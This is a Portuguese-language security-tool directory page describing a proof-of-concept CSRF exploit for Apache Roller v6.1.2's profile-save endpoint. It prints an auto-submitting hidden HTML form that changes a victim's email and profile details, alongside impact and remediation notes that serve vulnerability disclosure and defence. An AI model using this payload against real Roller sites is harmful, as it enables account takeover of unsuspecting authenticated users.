Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
roller-csrf — Exploit PoC para uma vulnerabilidade CSRF no endpoint de atualização de perfil do Apache Roller v6.1.2. Inclui código de exploit de formulário HTML para demonstrar alterações não autorizadas no perfil. | Kitploit
Ferramentas/GitHubGitHub/vanlam2001/roller-csrf
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubvanlam2001/roller-csrf

roller-csrf

Exploit PoC para uma vulnerabilidade CSRF no endpoint de atualização de perfil do Apache Roller v6.1.2. Inclui código de exploit de formulário HTML para demonstrar alterações não autorizadas no perfil.

Ver Repositório
há 9 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Apache Roller v6.1.2 - Cross-Site Request Forgery (CSRF) na Atualização de Perfil

Detalhes da Vulnerabilidade

  • Versão: v6.1.2
  • Data: 2025-11-09
  • Autor do Exploit: Van Lam Nguyen
  • Facebook: https://www.facebook.com/vanlam1412
  • Site do Fornecedor: https://roller.apache.org
  • Link do Software: https://github.com/apache/roller/archive/refs/tags/roller-6.1.2.zip
  • Testado em: Windows
  • CVE: N/A
  • Demonstração: https://youtu.be/iPEiVzcpJJU

Visão Geral

Foi descoberto que o Roller v6.1.2 e versões anteriores contêm uma vulnerabilidade de Cross-Site Request Forgery (CSRF) no endpoint /roller/roller-ui/profile!save.rol.

Esta vulnerabilidade permite que atacantes atualizem arbitrariamente as informações de perfil do usuário vítima (por exemplo, e-mail, nome completo, idioma, fuso horário) através de uma página HTML manipulada.

Prova de Conceito

A vulnerabilidade permite requisições não autorizadas para /roller/roller-ui/profile!save.rol que atualizam o perfil do usuário sem proteção CSRF.

Código de Exploit HTML

root@kitploit:~
<html>
<head>
    <form id="exploitForm" action="http://localhost:8080/roller/roller-ui/profile!save.rol" method="POST">
        <input name="bean.userName" value="vanlam" type="hidden">
        <input name="bean.screenName" value="hacked" type="hidden">
        <input name="bean.fullName" value="hacked" type="hidden">
        <input name="bean.emailAddress" value="[email protected]" type="hidden">
        <input name="bean.passwordText" value="" type="hidden">
        <input name="bean.passwordConfirm" value="" type="hidden">
        <input name="bean.locale" value="vi_VN" type="hidden">
        <input name="bean.timeZone" value="Asia/Bangkok" type="hidden">
    </form>

    <script>
        document.getElementById('exploitForm').submit();
    </script>
</head>
</html>

Parâmetros do Formulário

  • bean.userName: vanlam
  • bean.screenName: hacked
  • bean.fullName: hacked
  • bean.emailAddress: [email protected]
  • bean.passwordText: (vazio)
  • bean.passwordConfirm: (vazio)
  • bean.locale: vi_VN
  • bean.timeZone: Asia/Bangkok

Impacto

Um atacante pode criar uma página HTML maliciosa que, quando visitada por um usuário autenticado do Roller, enviará automaticamente um formulário para atualizar as informações de perfil da vítima sem o seu consentimento. Isso pode levar a:

  • Alterações não autorizadas nos dados do perfil do usuário
  • Potencial apropriação da conta caso o endereço de e-mail seja alterado
  • Interrupção da experiência do usuário através de mudanças de idioma e fuso horário

Remediação

  • Implementar tokens CSRF para todas as requisições que alteram o estado
  • Validar os cabeçalhos Origin e Referer
  • Usar cookies same-site
  • Implementar verificações adequadas de autenticação e autorização
Baixar ferramenta